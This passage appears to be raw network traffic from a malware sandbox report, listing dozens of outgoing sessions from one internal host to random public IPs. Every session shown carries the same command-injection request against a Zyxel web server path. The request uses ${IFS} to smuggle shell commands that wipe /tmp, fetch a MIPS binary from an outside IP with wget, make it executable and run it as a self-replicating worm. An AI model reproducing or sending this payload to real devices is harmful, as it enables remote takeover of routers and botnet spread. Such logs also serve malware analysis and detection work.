                                        Jan 14, 2024 16:18:50.587884903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5781192.168.2.133513063.164.101.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587944984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5782192.168.2.1351422103.147.22.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.587980032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5783192.168.2.134595031.116.209.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588037968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5784192.168.2.1335626120.248.138.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588090897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5785192.168.2.1341108157.118.1.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588118076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5786192.168.2.135211261.78.234.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588165998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5787192.168.2.1360504209.88.147.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588198900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5788192.168.2.1346354175.2.75.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588228941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5789192.168.2.1360164167.107.54.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588287115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5790192.168.2.1359794184.255.60.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588344097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5791192.168.2.134617024.132.45.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588385105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5792192.168.2.134183667.244.58.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588387966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5793192.168.2.1358648211.53.80.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588426113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5794192.168.2.1350242171.242.50.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588470936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5795192.168.2.133890272.153.177.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588527918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5796192.168.2.1336814102.153.205.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588570118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5797192.168.2.136065048.107.164.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588630915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5798192.168.2.134684231.141.46.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588661909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5799192.168.2.1356196223.7.167.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588711977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5800192.168.2.1347836110.143.110.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588757992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5801192.168.2.1340456205.156.56.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588793993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5802192.168.2.1352592208.156.248.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588828087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5803192.168.2.1337104202.45.15.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588864088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5804192.168.2.133761891.47.29.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.588973999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5805192.168.2.133799676.126.210.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589019060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5806192.168.2.134302443.100.58.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589060068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5807192.168.2.1343032189.35.172.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589102983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5808192.168.2.13604249.34.248.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589164019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5809192.168.2.136072498.225.12.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589216948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5810192.168.2.1341378183.20.9.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589263916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5811192.168.2.1346888181.129.138.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589308023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5812192.168.2.1335614139.250.242.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589346886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5813192.168.2.1358490188.87.171.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589380026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5814192.168.2.133496498.196.172.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589407921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5815192.168.2.1346412163.248.155.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589469910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5816192.168.2.13390229.206.146.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589536905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5817192.168.2.1344594130.105.126.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589567900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5818192.168.2.133349012.18.162.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589592934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5819192.168.2.1348708112.65.23.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589659929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5820192.168.2.134413423.36.202.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589699984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5821192.168.2.1343818175.53.160.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589742899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5822192.168.2.133933843.202.104.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589776993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5823192.168.2.1353848114.66.140.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589835882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5824192.168.2.1338658166.81.161.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589859009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5825192.168.2.1355668140.22.160.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589917898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5826192.168.2.1336068201.78.81.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589943886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5827192.168.2.135057080.56.223.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.589986086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5828192.168.2.1350420223.125.233.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590035915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5829192.168.2.1334620185.165.120.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590068102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5830192.168.2.1334318162.142.238.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590095043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5831192.168.2.135086261.200.78.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590131998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5832192.168.2.133551234.255.195.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590177059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5833192.168.2.1357532174.44.121.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590239048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5834192.168.2.133703241.14.113.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590266943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5835192.168.2.1334596172.200.18.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590316057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5836192.168.2.1346392145.233.76.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590353012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5837192.168.2.1351952189.159.176.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590389013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5838192.168.2.1360662120.226.104.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590429068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5839192.168.2.1355234121.245.132.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590466976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5840192.168.2.1336270181.233.28.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590503931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5841192.168.2.1344830151.65.236.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590542078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5842192.168.2.133524024.214.177.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590564966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5843192.168.2.1346610155.10.234.169443
                                        TimestampBytes transferredDirectionData
